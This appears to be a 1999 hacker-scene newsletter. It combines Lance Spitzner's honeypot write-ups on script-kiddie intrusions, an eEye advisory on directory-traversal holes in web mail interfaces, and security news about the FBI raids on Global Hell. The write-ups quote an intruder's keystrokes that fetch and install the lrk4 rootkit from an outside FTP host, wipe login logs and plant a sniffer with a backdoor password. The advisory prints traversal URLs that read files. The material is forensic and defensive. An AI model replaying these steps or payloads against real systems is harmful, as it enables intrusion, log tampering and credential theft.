I^F¸.sh!@~IF^D1À~HF^G~Iv^H~IF^L°^K~Ió~MN^H~MV^LÍ~@1À°^A1ÛÍ~@èEÿÿÿÿýÿPrivet ADMcrew~P(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(Apr 14 04:20:51 mozart ^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^ E^H(-^E^H-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E ^H(-^E^H-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^ H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E ^H(-^E^H(-^E When you see something like this in your log files, someone has attempted to exploit your system. It is difficult to determine if the exploit was successful. One way to do this is, following the exploit attempt, see if there are any connections from the remote source to your system. If they successfully login from the remote system, they have access. Another clue is if you find the accounts "moof", "rewt", "crak0", or "w0rm" added to your /etc/passwd file. These accounts, uid 0, are added by some of the more common exploit scripts. Once a blackhat gains access, normally the first thing they do is wipe your logs clean and trojan your logging (syslogd), for more information, see Know Your Enemy: III. From this point on, you will not receive any logs from your system as everything has been compromised. What you do next is subject for another article :). Until then, I recommend you check out http://www.cert.org/nav/recovering.html To help me find anomalies in my log files, I whipped up a shell script that scans my logs for me For more detailed information on grepping and sorting log files, check out this posting by Marcus Ranum. Bourne shell script Korn shell script #!/bin/bash # # Created 20 April, 1999 # Lance Spitzner, lance@spitzner.net # # Shows last 10 entries of critical system logs. # Build in some "artificial intelligence" using # greps and sorts. You can select a specific # hosts logs, or you can select all hosts logs. # # Add whatever grep/sort statements you want to the # functions below. The ones included are just # examples. ##### Build variables if [ "$1" = "all" ]; then system="" else system=$1 fi log=$2 ##### Functions secure () { echo -e "\n\t--- Last 10 entries in /var/log/secure ---\n" grep "$system" /var/log/secure | grep -v "172.16.1." | tail -10 } messages () { echo -e "\n\t--- Last 10 entries in /var/log/messages ---\n" grep "$system" /var/log/messages | grep -E -v '(named|MARK)' | tail -10 } maillog () { echo -e "\n\t--- Last 10 entries in /var/log/maillog ---\n" grep "$system" /var/log/maillog | tail -10 } title () { if [ "$system" = "" ]; then echo -e "\n### These are the log results of all systems ###" else echo -e "\n### These are the log results of system $system ###" fi } ##### Actual program case $log in secure) title secure ;; messages) title messages ;; maillog) title maillog ;; all) title secure messages maillog ;; *) echo -e "\nUsage: `basename $0` " echo echo " " echo " Can either be a single source you want to grep" echo " for in the log, or type \"all\" for all hosts in the" echo " log file." echo echo " " echo " secure -> for /var/log/secure" echo " messages -> for /var/log/messages" echo " maillog -> for /var/log/maillog" echo -e "\tall -> for all three log files\n" ;; esac exit 0 -=- #!/bin/ksh # # Created 20 April, 1999 # Lance Spitzner, lance@spitzner.net # # Shows last 10 entries of critical system logs. # Build in some "artificial intelligence" using # greps and sorts. You can select a specific # hosts logs, or you can select all hosts logs. # ##### Define input if [ "$1" = "all" ]; then system=":" else system=$1 fi log=$2 ##### Define logs inetdlog=/var/adm/inetdlog messages=/var/adm/messages syslog=/var/adm/syslog ##### Functions inetdlog () { echo "\n\t--- Last 10 entries in $inetdlog ---\n" grep "$system" "$inetdlog" | grep -v "172.16.1." | tail -10 } messages () { echo "\n\t--- Last 10 entries in $messages ---\n" grep "$system" "$messages" | egrep -v '(named|MARK)' | tail -10 } syslog () { echo "\n\t--- Last 10 entries in $syslog ---\n" grep "$system" "$syslog" | tail -10 } title () { if [ "$system" = ":" ]; then echo "\n### These are the log results of all systems ###" else echo "\n### These are the log results of system $system ###" fi } ##### Actual program case $log in inetdlog) title inetdlog ;; messages) title messages ;; syslog) title syslog ;; all) title inetdlog messages syslog ;; *) echo "\nUsage: `basename $0` " echo echo "\t " echo "\tCan either be a single source you want to grep" echo "\tfor in the log, or type \"all\" for all hosts in the" echo "\tlog file." echo echo "\t" echo "\tinetdlog -> for /var/log/inetdlog" echo "\tmessages -> for /var/log/messages" echo "\tsyslog -> for /var/log/syslog" echo "\tall -> for all three log files\n" ;; esac exit 0 Conclusion Your system logs can tell you a great deal about the enemy. However, the first step is guaranteeing the integrity of your log files. One of the best ways to do that is use a remote log server that receives and stores logs from all systems. Once secured, you can then identify patterns in your log files. Based on these patterns and log entries, you can determine what the blackhat is looking for, and potentially what tools they are using. Based on this knowledge, you can better secure and protect your systems. Author's bio Lance Spitzner enjoys learning by blowing up his Unix systems at home. Before this, he was an Officer in the Rapid Deployment Force, where he blew up things of a different nature. You can reach him at lance@spitzner.net . Part 3 They Gain Root Know Your Enemy: III Lance Spitzner Last Modified: 23 May, 1999 This article is the third of a series focusing on the script kiddie. The first paper focuses on how script kiddies probe for, identify, and exploit vulnerabilities. The second paper focuses on how you can detect these attempts, identify what tools they are using and what vulnerabilities they are looking for. This paper, the third, focuses on what happens once they gain root. Specifically, how they cover their tracks and what the do next. Who is the script kiddie As we learned in the first paper, the script kiddie is not so much a person as it is a strategy, the strategy of probing for the easy kill. One is not searching for specific information or targeting a specific company, the goal is to gain root the easiest way possible. Intruders do this by focusing on a small number of exploits, and then searching the entire Internet for that exploit. Do not understimate this strategy, sooner or later they find someone vulnerable. Once they find a vulnerable system and gain root, their first step is normally to cover their tracks. They want to ensure you do not know your system was hacked and cannot see nor log their actions. Following this, they often use your system to scan other networks, or silently monitor your own. To gain a better understanding of how they accomplish these acts, we are going to follow the steps of a system compromised by an intruder using script kiddie tactics. Our system, called mozart, is a Linux box running Red Hat 5.1. The system was compromised on April 27, 1999. Below are the actual steps our intruder took, with system logs and keystrokes to verify each step. All system logs were recorded to a protected syslog server, all keystrokes were captured using sniffit. Throughout this paper our intruder is refered to as he, however we have no idea what the true gender of the intruder is. The exploit On 27 April, at 00:13 hours, our network was scanned by the system 1Cust174.tnt2.long-branch.nj.da.uu.net for several vulnerabilities, including imap. Our intruder came in noisy, as every system in the network was probed (for more information on detecting and analyzing scans, please see the second paper of this series). Apr 27 00:12:25 mozart imapd[939]: connect from 208.252.226.174 Apr 27 00:12:27 bach imapd[1190]: connect from 208.252.226.174 Apr 27 00:12:30 vivaldi imapd[1225]: connect from 208.252.226.174 Apparently he found something he liked and returned at 06:52 and 16:47 the same day. He started off with a more thorough scan, but this time focusing only on mozart. He identified a weakness and launched a successful attack against mountd, a commonly known vulnerability for Red Hat 5.1. Here we see in /var/log/messages the intruder gaining root. The tool used was most likely ADMmountd.c, or something similar to it. Apr 27 16:47:28 mozart mountd[306]: Unauthorized access by NFS client 208.252.226.174. Apr 27 16:47:28 mozart syslogd: Cannot glue message parts together Apr 27 16:47:28 mozart mountd[306]: Blocked attempt of 208.252.226.174 to mount ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ Immediately following this exploit, we see in /var/log/messages our intruder gaining root by telneting in as the user crak0, and then su to the user rewt. Both of these accounts were added by the exploit script. Our intruder now has total control of our system. Apr 27 16:50:27 mozart login[1233]: FAILED LOGIN 2 FROM 1Cust102.tnt1.long-branch.nj.da.uu.net FOR crak, User not known to the underlying authentication module Apr 27 16:50:38 mozart PAM_pwdb[1233]: (login) session opened for user crak0 by (uid=0) Apr 27 16:50:38 mozart login[1233]: LOGIN ON ttyp0 BY crak0 FROM 1Cust102.tnt1.long-branch.nj.da.uu.net Apr 27 16:50:47 mozart PAM_pwdb[1247]: (su) session opened for user rewt by crak0(uid=0) Covering their tracks The intruder is now on our system as root. As we are now about to see, the next step for him is to make sure he does not get caught. First, he checks to see if anyone else is on the system. [crak0@mozart /tmp]$ w 4:48pm up 1 day, 18:27, 1 user, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT crak0 ttyp0 1Cust102.tnt1.lo 4:48pm 0.00s 0.23s 0.04s w After making sure the coast is clear, he will want to hide all of his actions. This normally entails removing any evidence from the logs files and replacing system binaries with trojans, such as ps or netstat, so you cannot see the intruder on your own system. Once the trojans are in place, the intruder has gained total control of your system and you will most likely never know it. Just as there are automated scripts for hacking, there are also automated tools for hiding intruders, often called rootkits. One of the more common rootkits is lrk4. By executing the script, a variety of critical files are replaced, hiding the intruder in seconds. For more detailed information on rootkits, see the README that comes with lrk4. This will give you a better idea how rootkits work in general. Within minutes of compromising our system, we see the intruder downloading the rootkit and then implementing the script with the command "make install". Below are the actual keystrokes the intruder typed to hide himself. cd /dev/ su rewt mkdir ". " cd ". " ftp technotronic.com anonymous fdfsfdsdfssd@aol.com cd /unix/trojans get lrk4.unshad.tar.gz quit ls tar -zxvf lrk4.unshad.tar.gz mv lrk4 proc mv proc ". " cd ". " ls make install Notice the first thing that our intruder did, he created the hidden directory ". " to hide his toolkit. This directory does not show up with the "ls" command, and looks like the local directory with "ls -la" command. One way you can locate the directory is with the "find" command (be sure you can trust the integrity of your "find" binary). mozart #find / -depth -name "*.*" /var/lib/news/.news.daily /var/spool/at/.SEQ /dev/. /. /procps-1.01/proc/.depend /dev/. /. /dev/. Our intruder may have been somewhat sophisticated in using trojan binaries, but had a simpler approach to cleaning the logs files. Instead of using cleaning tools such as zap2 or clean, he copied /dev/null to the files /var/run/utmp and /var/log/utmp, while deleting /var/log/wtmp. You know something is wrong when these logs files contain no data, or you get the following error: [root@mozart sbin]# last -10 last: /var/log/wtmp: No such file or directory Perhaps this file was removed by the operator to prevent logging last info. The next step Once a system has been compromised, intruders tend to do one of two things. First, they use your system as a launching pad and scan or exploit other systems. Second, they decided to lay low and see what they can learn about your system, such as accounts for other systems. Our intruder decided for option number two, lay low and see what he could learn. He implemented a sniffer on our system that would capture all of our network traffic, including telnet and ftp sessions to other systems. This way he could learn logins and passwords. We see the sytem going into promiscuous mode in /var/log/messages soon after the compromise. Apr 27 17:03:38 mozart kernel: eth0: Setting promiscuous mode. Apr 27 17:03:43 mozart kernel: eth0: Setting promiscuous mode. After implementing the trojan binaries, clearning the log files, and starting the sniffer, our intruder disconnected from the system. However, we will see him returning the next day to find what traffic he captured. Damage Control Since our friend had disconnected, this gave me a chance to review the system and see what exactly happened. I was extremely interested to see what was altered, and where he was logging the sniffer information. First, I quickly identified with Tripwire which files were modified. Tripwire showed the following: added: -rw-r--r-- root 5 Apr 27 17:01:16 1999 /usr/sbin/sniff.pid added: -rw-r--r-- root 272 Apr 27 17:18:09 1999 /usr/sbin/tcp.log changed: -rws--x--x root 15588 Jun 1 05:49:22 1998 /bin/login changed: drwxr-xr-x root 20480 Apr 10 14:44:37 1999 /usr/bin changed: -rwxr-xr-x root 52984 Jun 10 04:49:22 1998 /usr/bin/find changed: -r-sr-sr-x root 126600 Apr 27 11:29:18 1998 /usr/bin/passwd changed: -r-xr-xr-x root 47604 Jun 3 16:31:57 1998 /usr/bin/top changed: -r-xr-xr-x root 9712 May 1 01:04:46 1998 /usr/bin/killall changed: -rws--s--x root 116352 Jun 1 20:25:47 1998 /usr/bin/chfn changed: -rws--s--x root 115828 Jun 1 20:25:47 1998 /usr/bin/chsh changed: drwxr-xr-x root 4096 Apr 27 17:01:16 1999 /usr/sbin changed: -rwxr-xr-x root 137820 Jun 5 09:35:06 1998 /usr/sbin/inetd changed: -rwxr-xr-x root 7229 Nov 26 00:02:19 1998 /usr/sbin/rpc.nfsd changed: -rwxr-xr-x root 170460 Apr 24 00:02:19 1998 /usr/sbin/in.rshd changed: -rwxr-x--- root 235516 Apr 4 22:11:56 1999 /usr/sbin/syslogd changed: -rwxr-xr-x root 14140 Jun 30 14:56:36 1998 /usr/sbin/tcpd changed: drwxr-xr-x root 2048 Apr 4 16:52:55 1999 /sbin changed: -rwxr-xr-x root 19840 Jul 9 17:56:10 1998 /sbin/ifconfig changed: -rw-r--r-- root 649 Apr 27 16:59:54 1999 /etc/passwd As you can see, a variety of binaries and files were modified. There were no new entries in /etc/passwd (wisely, he had removed the crak0 and rewt accounts), so our intruder must have left a backdoor in one of the modified binaries. Also, two files were added, /usr/sbin/sniff.pid and /usr/sbin/tcp.log. Not suprisingly, /usr/sbin/sniff.pid was the pid of the sniffer, /usr/sbin/tcp.log was where he was storing all of his captured information. Based on /usr/sbin/sniff.pid, the sniffer turned out to be rpc.nfsd. Our intruder had compiled a sniffer, in this case linsniffer, and replaced rpc.nfsd with it. This ensured that if the system was rebooted, the sniffer would be restarted by the init process. Strings confirms rpc.nfsd is the sniffer: mozart #strings /usr/sbin/rpc.nfsd | tail -15 cant get SOCK_PACKET socket cant get flags cant set promiscuous mode ----- [CAPLEN Exceeded] ----- [Timed Out] ----- [RST] ----- [FIN] %s => %s [%d] sniff.pid eth0 tcp.log cant open log rm %s After reviewing the system and understanding what happened, I left the system alone. I was curious to see what the intruder's next steps would be. I did not want him to know that I had caught him, so I removed all of my entries from /usr/sbin/tcp.log. The Script Kiddie Returns The following day our friend returned. By logging his keystrokes, I quickly identified the backdoor, /bin/login was trojaned. This binary, used for telnet connections, was configured to allow the account "rewt" root privileges with the password "satori". The password "satori" is the default password for all trojaned binaries that the rootkit lrk4 uses, a giveaway that your system may have been compromised. The intruder was checking on his sniffer to ensure it was still functioning. Also, he wanted to confirm if any accounts were captured since the previous day. You can review his keystrokes at keystrokes.txt. Notice at the bottom of the log our intruder kills the sniffer. This was the last thing he did before terminating the session. However, he quickly returned several minutes later with another session, only to start the sniffer again. I'm not exactly sure why he did this. This process of checking the system continued for several days. Every day the intruder would connect to the system to confirm the sniffer was running and if it had captured any valuable data. After the fourth day, I decided that this was enough and disconnected the system. I had learned enough from the intruder's actions and was not going to learn anything new. Conclusion We have seen in this paper how an intruder may act , from start to finish, once they gain root on your system. They often begin by checking to see if anyone is on the system. Once they know the coast is clear, they cover their tracks by clearing the logfiles and replacing or modifying critical files. Once they are safely hidden, they move onto new and more damaging activities. These tactics are here to stay, as new exploits are constantly being discovered. To better protect yourself against these threats, I recommend you armor your systems. Basic armoring will protect against most script kiddie threats, as they normally go for the easy kill. For ideas on how to armor your system, check out Armoring Linux or Armoring Solaris. If it is to late and you feel your system has already been compromised, a good place to start is CERT's site "Recovering from an Incident" . Author's bio Lance Spitzner enjoys learning by blowing up his Unix systems at home. Before this, he was an Officer in the Rapid Deployment Force, where he blew up things of a different nature. You can reach him at lance@spitzner.net . @HWA 11.0 Cox Report Blasts DOE Computer Security ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by erewhon In addition to revealing that China has stole numerous military secrets from the US the Cox Report, unclassified yesterday, blasts the Department of Energy on computer security. The report blamed the DOE for giving to much computer access to foreign nationals. The issue is access to systems or information covered by export control laws. While the systems or software are not physically exported, use of the technology by some foreign nationals is called a "deemed export" and is covered under Department of Commerce rules. Federal Computer Week http://www.fcw.com/pubs/fcw/1999/0524/web-doe-5-25-99.html MAY 25, 1999 . . . 18:25 EDT House report faults DOE computer access by foreign nationals BY ELANA VARON (varon@fcw.com) A report issued today about theft of U.S. nuclear secrets by China concludes that the Energy Department has been too free in granting foreign nationals access to its supercomputers. The report, by the House Select Committee on U.S. National Security and Military/Commercial Concerns With the People's Republic of China, said DOE officials are required to review whether such access violates federal export controls. But the report also said lab officials "lack an essential understanding" of the export rules. The report cited interviews with Commerce Department officials who said they did not recall ever receiving a license application to "export" the technology from any of the labs. Although the systems or software are not physically exported, use of the technology by some foreign nationals is called a "deemed export" because sending the technology overseas would require a license. The report said the labs do not measure the power of their systems in such a way that they could determine which systems are subject to the export rules, and lab officials never asked Commerce how to determine if the DOE systems were subject to export control. The report also concluded that foreign graduate students and staff at U.S. universities who are conducting DOE-supported research have the same computer privileges as students who are U.S. citizens, even though some of the foreign students are affiliated with their countries' intelligence agencies. The report noted that DOE is preparing a counterintelligence plan that addresses these issues. @HWA 12.0 Black Hat Briefings Announced ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Code Kid Come and meet the Hackers. Secure Computing has officially announced Black Hat '99 the third annual meeting of the minds between security professionals, white and black hat hackers. (If you are deep in the Security business and can only go to one conference then this is it.) (And Microsoft is now a cosponsor, how ironic is that?) PR Newswire http://biz.yahoo.com/prnews/990525/ca_secure__1.html BlackHat http://www.blackhat.com/ PR Newswire; Tuesday May 25, 8:45 am Eastern Time Company Press Release SOURCE: Secure Computing Corporation Secure Computing Corporation Announces Black Hat Briefings '99, Bringing Together Corporate and Government Experts, and Hackers to Address Y2K And Enterprise Security SAN JOSE, Calif., May 25 /PRNewswire/ -- Secure Computing (Nasdaq: SCUR - news) today announced that Secure Computing Black Hat Briefings '99, the exclusive security conference, will take place from July 7-8, 1999 at the Venetian Hotel on the Las Vegas Strip. This third annual conference brings corporate and government engineers and software programmers face-to-face with today's cutting edge computer security experts and ``underground'' security specialists for two days of intensive discussions on who's breaking in to computer networks, how they are doing it, how Y2K is affecting security, and what can be done to address this. The conference, with title sponsorship by Secure Computing, and lead sponsorship by Microsoft (Nasdaq: MSFT - news),National Computer Security Center, Counterpane Systems and Network Flight Recorders is designed to fill the need of computer professionals to better understand the security risks to their computer and information infrastructures by potential threats. To do this, Secure Computing assembles a group of vendor neutral security professionals at the same forum, where they will candidly discuss and debate the problems businesses face, and the solutions they see to those problems. Secure Computing Black Hat Briefings '99 is not for security dilettantes or marketers looking to hawk their vendors' wares -- just straight talk by people who make it their business to explore the ever-changing security space. Spanning two days the conference has three separate tracks, two focused at technical audiences with a third a new ``White Hat'' tract that is focused at CIO's, CEO's and other senior level people. Topics will include Y2K and what it means to system security, how to detect and repel attacks on a network, secure programming techniques and tool selection for creating and effectively monitoring secure networks. Secure Computing Black Hat Briefings '99 intense sessions will bring to light the security problems confronting organizations and network administrators, most of which go unnoticed by today's preoccupied system administrators who are often more worried about network growth, updates and Y2K problems. Running the conference is Jeff Moss, Director of Assessment Services at Secure Computing. Prior to joining Secure Computing, Moss was at Ernst & Young, LLP, where he was a manager in the Information Security Services (ISS) group. Moss also successfully owned and operated DEF CON Communications, a computer consulting company that focused on network security solutions. ``It is crucial that we continue to educate organizations on the risks they face daily. Network security breaches are real, and are costing organizations hundreds of millions of dollars every year,'' said Moss. ``The coming year will be crucial for organizations in regards to their network security. Taking a myopic approach only to the Y2K issue that does not involve diligent attention to security could lead to severe consequences. Being Y2K compliant really won't matter for much if an organization's network is rendered ineffective by hacker attacks and intrusions. That is why a forum like Secure Computing Black Hat Briefings '99 is so important in educating businesses and governments about the very real threats that are out there.'' Presenters range from corporate and government security system managers to master hackers themselves, including Dr.Mudge, one of the prominent members of the hacker group 'The L0pht', who is responsible for numerous advisories and tools in use in both the black hat and white hat communities; Peter Shipley, who is well known and respected in the professional world as well as the underground and hacker community and whose specialties are third party penetration testing and firewall review, computer risk assessment, and security training; and Bruce Schneier, author of applied Cryptography and president of Counterpane Systems. More Information, and How to Register Detailed information on Secure Computing Black Hat Briefings '99, including a speaker's schedule, biographies of presenters, and information on how to register and reserve hotel rooms, can be found via the Secure Computing Web site (http://www.securecomputing.com ) and by clicking on the Black Hat Briefings '99 icon. About Secure Computing Headquartered in San Jose, Calif., Secure Computing Corporation provides enterprise-wide network security solutions to a worldwide partner and customer base in financial services, telecom, aerospace, manufacturing, hi-tech, service providers and government agencies. More information is available over the Internet at www.securecomputing.com or by calling: in the U.S., 800-379-4944 or 408-918-6100; in Europe, 44-1753-826000; in Asia/Pacific, 61-2-9844-5440. NOTE: All registration and trademarks are proprietary to their respective owners From secure computing; The Black Hat Briefings '99, July 7-8th Las Vegas The Black Hat Briefings '99, July 7-8th Las Vegas It's late. You're in the office alone, catching up on database administration. Behind you, your network servers hum along quietly, reliably. Life is good. No one can get to your data or disrupt your WAN. The network is secure. Or is it? The Black Hat Briefings conference has been organized to put an end to concerns like these. While many conferences focus on information and network security, only The Black Hat Briefings will put your engineers and software programmers face-to-face with today's cutting edge computer security experts and "underground" security specialists. The "White Hat" track will inform your CEO or CIO with no-nonsense information about what issues to be aware of, and what they can ignore. Only the Black Hat Briefings conference will provide your people with the tools and understanding they need to help thwart those lurking either in the shadows of your firewall or the depths of your companies WAN. The reality is, they are out there. The choice is yours. You can live in fear of them. Or, you can learn from them. Conference Overview The Black Hat Briefings conference series was created to fill the need of computer professionals to better understand the security risks to their computer and information infrastructures by potential threats. To do this we assemble a group of vendor neutral security professionals in the same room and let them talk candidly about the problems businesses face, and the solutions they see to those problems. No gimmicks, just straight talk by people who make it their business to explore the ever changing security space. Spanning two days with three separate tracks, The Black Hat Briefings will focus on the vital security issues facing organizations with large Enterprise networks and mixed network operating systems. Topics will Include Intrusion Detection Systems (IDS), Computer Forensics (CF) systems, Incident Response, secure programming techniques and tool selection for creating and effectively monitoring your networks. You will be put face to face with the people developing the tools used by and against hackers. This year the Black Hat Briefings has grown to include a separate track specifically designed for the CEO and CIO. This third track, nick named the "White Hat" track, was developed by the National Computer Security Center (NCSC) of the National Security Agency. While the other tracks have a technology focus, this track is for people who have to manage it. What should you look for when hiring an outside security consultant? Should you even look outside your organization? The Black Hat Briefing's intense sessions will bring to light the security and mis-configuration problems confronting organizations and network administrators, most of which go unnoticed by today's preoccupied system administrators where security gets put off in lieu of constant network growth and upgrades. Our speakers will discuss the strategies involved in correcting existing problems and speak towards what you can expect in the future. This year you can expect more visual demonstrations, more speakers who are authoritative in their fields, and as always an excellent time. As an added bonus, people who attend The Black Hat Briefings get free admission to DEF CON 7.0, the largest Hacker convention in the US, held right after Black Hat in Las Vegas. For more information see their web site. Who is this conference for? CEOs and CIOs, MIS and IT managers as well as the people doing the work. Basically anyone dealing with the security functions at your company looking for deep insight into the security space. Registration Costs Registration costs are $995 US before June 14th 1999 Late registration fees are $1,195 after June 14th. You may cancel your registration before July 1st for a full refund. This fee includes two days of speaking, materials, a reception, and meals. To register, please use the button on the left hand side of this page. We have excellent rates at the Venetian Hotel! Do not be discourage by its splendor! Discount Airfare We've got great discounts on airfare from Montrose Travel, who book bulk air travel. If you need to still book airline tickets please give Montrose a call first. Montrose Travel 1-800-301-9673 http://www.montrosetravel.com They currently have deals for Black Hatattendees from the US and International on the following airlines: America West Southwest Delta American Southwest Airlines United Airlines and other smaller carriers and even International Airfare rates. Expect rates lower than published. When calling make sure you refer to The Black Hat Briefings as the group name. 13.0 eEYe Digital Security advisory: Multiple Web Interface Security Holes ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Multiple Web Interface Security Holes Systems Affected CMail 2.3 FTGate 2,1,2,1 NTMail 4.20 Release Date May 26, 1999 Advisory Code AD05261999 Description: The following holes were found while testing Retina against a few various services that have web based interfaces. The holes are nothing amazing just common amongst many web based interfaces. We are sure some other software will be found with similar holes... if you come across some contact info@eeye.com and let us know. ---> CMail The default location of the web based interface for CMail is C:\Program Files\Computalynx\CMail Server\pages\. It is a simple hole. For example if we were to load http://[server]:8002/../spool/username/mail.txt in our web browser we would be looking at the email for that user. Note: Mail.txt is not the real mail file. There is one minor problem... reading of files is not totally straight forward. It seems CMail has some mechanism of what it will read or not. If you have a text file with no carriage returns in it CMail will not read it. There also exists multiple buffer overflows within the various SMTP and POP server functions of CMail. Yes they are exploitable. >:-] ---> FTGate Same as above basically. http://[server]:8080/../newuser.txt The only difference is that FTGate doesn't seem to mind if the file has the carriage returns or not. ---> NTMail NTMail suffers from the same programming flaw... http://[server]:8000/../../../../../boot.ini. There is other server software out there that suffers from these common holes. An average of 65% of the software we have tested thus far has had problems with restricting the path that they allow. NTMail as well as the other two can be run as a service, NTMail does it by default, therefore you can read files as SYSTEM on most of them. Fixes Disable the web interfaces where applicable until the vendors release patches. Vendor Status All vendors have been notified. Copyright (c) 1999 eEye Digital Security Team Permission is hereby granted for the redistribution of this alert electronically. It is not to be edited in any way without express consent of eEye. If you wish to reprint the whole or any part of this alert in any other medium excluding electronic medium, please e-mail alert@eEye.com for permission. Disclaimer: The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties with regard to this information. In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk. Please send suggestions, updates, and comments to: eEye Digital Security Team info@eEye.com http://www.eEye.com @HWA 14.0 Fun with ICQ ~~~~~~~~~~~~ Just stumbled across this site in my travels, has some interesting info check 'em out.... From http://home.earthlink.net/~childzplay/comp.html Although Miribalis says they do not recommend using 99a yet, I've been using it for about 1 month and haven't had any trouble with it. Some other people I know have not been so lucky. I guess it is a use at your own risk deal until they officially release the 99a final version. If you didn't know, the server that comes as default in v.99a is watched closely by Miribalis. Therefore, if you want to go on an exploit journey, I would suggest connecting up to a more stable, and less watched server. Here are some for your entertainment: Mirabilis.com 4000, ICQMirabilis.com 4000, icq.mirabilis.com 4000, icq0.mirabilis.com 4000, icq1.mirabilis.com 4000, icq2.mirabilis.com 4000, icq3.mirabilis.com 4000, icq4.mirabilis.com 4000, icq5.mirabilis.com 4000, icq.lmirabilis.com 4000, 38.151.231.40 4000, 38.161.231.4 4000, 38.161.231.40 4000, 38.161.231.41 4000, 38.161.231.44 4000, 38.161.231.45 4000, 38.161.231.49 4000, 38.161.232.40 4000, 38.161.232.44 4000, 38.161.232.45 4000, 104.99.113.49 4000, 105.99.113.49 4000, 202.68.84.41 4000, 204.91.242.25 4000, 204.91.242.35 4000, 204.91.242.44 4000, 204.91.242.112 4000, 204.91.243.90 4000, 204.91.243.113 4000, 204.91.243.115 4000, 207.95.232.2 4000, 208.21.43.40 4000, 208.21.43.50 4000, 208.22.84.41 4000, 208.161.231.40 4000, 208.202.84.11 4000, 208.202.84.21 4000, 208.202.84.41 4000, 208.204.84.41 4000, 208.208.82.41 4000, 208.208.84.41 4000, 208.215.43.40 4000, 208.215.43.41 4000, 208.215.43.50 4000, 208.215.43.50 4000, 208.215.43.77 4000, 208.215.43.90 4000, 208.315.43.50 4000, 209.83.180.44 4000, 209.83.180.45 4000, 209.91.242.25 4000, 209.91.242.35 4000 @HWA 15.0 FBI raids suspected hackers ~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ Received: by hackernews (mbox contact) (with Cubic Circle's cucipop (v1.31 1998/05/13) Thu May 27 15:40:08 1999) X-From_: [deleted]@hotmail.com Wed May 26 16:20:14 1999 Delivered-To: submit@hackernews.com Received: from hotmail.com (law2-f208.hotmail.com [216.32.XXX.XXX]) by hackernews.com (Postfix) with SMTP id A87D4469F for ; Wed, 26 May 1999 16:20:13 -0500 (EST) Received: (qmail 39781 invoked by uid 0); 26 May 1999 21:23:12 -0000 Message-ID: <1999052621.39780.qmail@hotmail.com> Received: from 192.116.XXX.XXX by www.hotmail.com with HTTP; Wed, 26 May 1999 14:23:11 PDT X-Originating-IP: [192.116.XXX.XXX] From: "[deleted]" <[deleted]@hotmail.com> To: submit@hackernews.com Subject: www.fbi.gov IS DEAD Date: Wed, 26 May 1999 21:23:11 GMT Mime-Version: 1.0 Content-type: text/plain; format=flowed; Return-Path: Date: 5/26/99 17:23 Received: 5/27/99 16:48 From: [deleted]@hotmail.com To: submit@hackernews.com FBI WILL NOT FUCKIN WITH MY FRIENDS FROM GLOBAL HELL (gH) www.fbi.gov IS DEAD im the Israeli ghost and yes i am from israel the fbi will stop hunting hackers gangsters dont dance we boggy today is the 25.5.99 israeli time is : 00:22 www.fbi.gov will stay down all day ! the Israeli Ghost _______________________________________________________________ Get Free Email and Do More On The Web. Visit http://www.msn.com FBI Raids Suspected Crackers. contributed by darkscent It is often difficult to separate the fact from the fiction, rumors, supposition, and unsubstantiated allegations that fly around the net when big news breaks. This is what HNN has been able to verify so far. Yesterday morning at aprox 6:00 am CST the FBI executed nine search warrants in Houston, Seattle and various California locations. HNN believes that some of those who where raided where iCBM, MostHated, loophole, Spaceg0at, soulblazer, fryz, vallah and Cl0pz. HNN has not learned of any arrests that have been made. While the FBI has not revealed why the search warrants were executed it is believed to have some relation to the recent crack of whitehouse.gov. HNN has received no confirmation of Most Wanted lists or FBI Directives, rumors of which have been floating around the net. MSNBC http://www.msnbc.com/news/273819.asp In response to the recent raids several other members of gH (Global Hell) as well as other groups such as Team spl0it have attacked numerous web sites, (estimates range from between 40 and 100). The FBI has admitted to receiving a major Denial of Service attack, and the US Senate web site was defaced for a few minutes. In an interview with MSNBC MostHated said "The retaliation has to stop." HNN received an email from "Israeli Ghost" claiming responsibility for the FBI DoS attack. HNN was also able to snag the US Senate web page defacement before it was restored. Nando Times http://www.techserver.com/story/body/0,1634,53692-86005-610419-0,00.html CNN http://www.cnn.com/TECH/computing/9905/27/senate.hackers/ C|Net http://www.news.com/News/Item/0,4,37138,00.html?owv Israeli Ghost Email http://www.hackernews.com/orig/ghost.html HNN Cracked Pages Archive http://www.hackernews.com/archive/crackarch.html Last week, a gH member Zyklon (Eric Burns), was indicted in connection with three separate attacks on Virginia area systems owned by Computer Tech Services, Issue Dynamics, and Electric Press which housed the web site of the United States Information Agency. The Seattle Times has run a biographical piece on Zyklon. The story has quotes from his classmates and parents. Seattle Times http://www.seattletimes.com/news/local/html98/hack_19990525.html Zyklon's Indictment http://www.hackernews.com/orig/zyklon.html MSNBC: Feds vs. hackers: The battle widens FBI and Senate shut down Web sites after a series of attacks; skirmishes waged with search warrants and Internet sieges By Brock Meeks, Alan Boyle and Bob Sullivan MSNBC May 28 Computer attacks on the FBI and U.S. Senate Web sites are leading to a broader criminal investigation into such intrusions, officials indicated Friday. The latest skirmish between federal authorities and Web site attackers began Wednesday with FBI raids on purported members of a group called gH, or Global Hell, in at least three states and has continued with a protest campaign targeting a wide spectrum of Internet sites. THE FBI and Senate Web sites remained inaccessible Friday as a result of the computer attacks. The FBI shut down its Web site Wednesday after it was swamped 